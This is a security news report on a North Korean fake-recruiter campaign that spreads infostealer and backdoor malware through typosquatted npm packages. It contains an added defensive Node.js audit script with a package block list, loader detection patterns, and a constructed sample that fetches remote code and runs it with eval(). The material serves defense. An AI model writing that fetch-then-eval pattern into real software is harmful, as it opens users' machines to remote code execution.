
New wave of ‘fake interviews’ uses 35 npm packages to spread malware


A new wave of North Korea’s ‘Contagious Interview’ campaign is targeting job seekers with malicious npm packages that infect developers’ devices with infostealers and backdoors.

The packages were discovered by Socket’s threat research team, which reports that they load the BeaverTail infostealer and the InvisibleFerret backdoor on victims’ machines, two well-documented payloads associated with DPRK actors.

The latest attack wave uses 35 malicious packages submitted to npm through 24 accounts. The packages have been downloaded over 4,000 times in total, and 6 of them remain available at the time of writing.

Several of the 35 malicious npm packages typosquat or mimic well-known and trusted libraries, making them especially dangerous.

Notable examples of these are:

  • react-plaid-sdk, reactbootstraps
  • vite-plugin-next-refresh, vite-loader-svg
  • node-orm-mongoose
  • jsonpacks, jsonspecific
  • chalk-config
  • node-loggers, *-logger
  • framer-motion-ext
  • nextjs-insight
  • struct-logger, logbin-nodejs

Victims, usually software engineers and developers, are led to download these packages by North Korean operatives posing as recruiters, who ask job candidates to work on a test project.

“Posing as recruiters on LinkedIn, the North Korean threat actors send coding ‘assignments’ to developers and job seekers via Google Docs, embed these malicious packages within the project, and often pressure candidates to run the code outside containerized environments while screen-sharing,” explains Socket.

Figure: baiting document sent to targets. Source: Socket

The assignments are hosted on Bitbucket and disguised as legitimate tests, but in reality they trigger an infection chain that drops multiple payloads on the target’s computer.

The first stage is HexEval Loader, hidden inside the npm packages, which fingerprints the host, contacts the threat actor’s command-and-control (C2) server, and uses ‘eval()’ to fetch and execute the second-stage payload, BeaverTail.
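The two concrete things a defender can act on in this report are the list of package names above and the fetch-then-eval behaviour just described. The following is an added example, not code from the article or from Socket: a small audit helper for a Node.js project that flags declared dependencies matching the listed names (treating the ‘*-logger’ entry as a name pattern), lists install-time lifecycle scripts as general npm hygiene, and scans source files for an eval sink and an outbound HTTP call in the same file. The hex-escaped-blob check is this example’s own assumption about obfuscation, not something the article states, and the sample package.json and source snippets at the bottom are constructed.

```javascript
// Added example, not code from the article or from Socket. Defensive audit
// helper for a Node.js project: checks declared dependencies against the
// package names the report lists (plus its '*-logger' wildcard) and scans
// source files for the eval()-plus-outbound-network pattern the article
// attributes to the HexEval loader. Sample inputs below are constructed.

// Package names as listed in the report.
const KNOWN_MALICIOUS = new Set([
  'react-plaid-sdk', 'reactbootstraps', 'vite-plugin-next-refresh',
  'vite-loader-svg', 'node-orm-mongoose', 'jsonpacks', 'jsonspecific',
  'chalk-config', 'node-loggers', 'framer-motion-ext', 'nextjs-insight',
  'struct-logger', 'logbin-nodejs',
]);
// The report also lists '*-logger'; treat it as a name pattern to review.
const NAME_PATTERNS = [/-logger$/];

// One entry per dependency (regular or dev) that is listed in the report or
// matches a listed wildcard.
function flagDependencies(pkgJson) {
  const deps = { ...(pkgJson.dependencies || {}), ...(pkgJson.devDependencies || {}) };
  const hits = [];
  for (const name of Object.keys(deps)) {
    if (KNOWN_MALICIOUS.has(name)) {
      hits.push({ name, reason: 'listed in report' });
    } else if (NAME_PATTERNS.some((re) => re.test(name))) {
      hits.push({ name, reason: 'matches *-logger wildcard, review manually' });
    }
  }
  return hits;
}

// Heuristic for a fetch-then-eval loader: the same file contains a dynamic
// code-execution sink and an outbound HTTP primitive. A long run of
// hex-escaped bytes is reported separately as an obfuscation indicator
// (an assumption of this example, not a statement from the article).
function scoreSource(src) {
  const evalSink = /\beval\s*\(|new\s+Function\s*\(/.test(src);
  const network = /\b(?:https?\.(?:request|get)|fetch|axios(?:\.\w+)?)\s*\(/.test(src);
  const hexBlob = /(?:\\x[0-9a-fA-F]{2}){8,}/.test(src);
  return { evalSink, network, hexBlob, suspicious: evalSink && network };
}

// Install-time lifecycle scripts run automatically on `npm install`; listing
// them is general npm supply-chain hygiene, not a finding from the report.
function lifecycleScripts(pkgJson) {
  const scripts = pkgJson.scripts || {};
  return ['preinstall', 'install', 'postinstall'].filter((k) => k in scripts);
}

// Audit a project. `files` maps a relative path to its source text.
function auditProject(pkgJson, files) {
  const findings = [];
  for (const hit of flagDependencies(pkgJson)) {
    findings.push(`dependency ${hit.name}: ${hit.reason}`);
  }
  for (const hook of lifecycleScripts(pkgJson)) {
    findings.push(`lifecycle script "${hook}" runs on install: ${pkgJson.scripts[hook]}`);
  }
  for (const [path, src] of Object.entries(files)) {
    const s = scoreSource(src);
    if (s.suspicious) findings.push(`${path}: eval sink and network call in the same file`);
    else if (s.hexBlob) findings.push(`${path}: long hex-escaped string blob`);
  }
  return findings;
}

// Constructed sample input: a hypothetical "assignment" project, not a real
// package and not a captured loader.
const SAMPLE_PKG = {
  name: 'candidate-assignment',
  dependencies: { 'react-plaid-sdk': '^1.0.0', express: '^4.19.0' },
  devDependencies: { 'my-app-logger': '^0.1.0' },
  scripts: { postinstall: 'node setup.js' },
};
const SAMPLE_FILES = {
  'setup.js':
    "const https = require('https');\n" +
    "https.get(process.env.CFG_URL, (res) => { let body = '';\n" +
    "  res.on('data', (d) => { body += d; });\n" +
    "  res.on('end', () => eval(body)); });\n",
  'index.js': "module.exports = (x) => JSON.parse(x);\n",
};

for (const line of auditProject(SAMPLE_PKG, SAMPLE_FILES)) console.log(line);
```

On the constructed sample this reports the listed package, the wildcard match, the postinstall hook, and setup.js as a fetch-then-eval candidate, while the harmless index.js is silent. The name list is only as good as the report it comes from, so the source heuristic is the part worth keeping in a pre-run review of any recruiter-supplied project; it will also flag legitimate code that evaluates downloaded scripts, which is exactly the kind of file that deserves a second look before running outside a container.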

BeaverTail is a multi-platform infostealer and malware loader that steals browser data, including cookies and cryptocurrency wallets, and loads the third stage, InvisibleFerret.

InvisibleFerret is a cross-platform persistent backdoor delivered as a ZIP file, giving the attackers deeper, ongoing access to the victim’s system with remote control, file theft, and screenshot capabilities.

Finally, the attackers drop a cross-platform (Windows, macOS, Linux) keylogger tool that hooks into low-level input events and performs real-time surveillance and data exfiltration.

This keylogger was only associated with one of the npm aliases used in the campaign, so it may be deployed only against select high-value targets.

Figure: overview of the attack. Source: Socket

Software developers approached with lucrative remote job offers should treat these invitations with caution and always run unknown code in containers or virtual machines instead of executing it directly on their host OS.

Last March, North Korean hackers Lazarus were caught submitting another set of malicious packages to npm, so this is an ongoing threat.
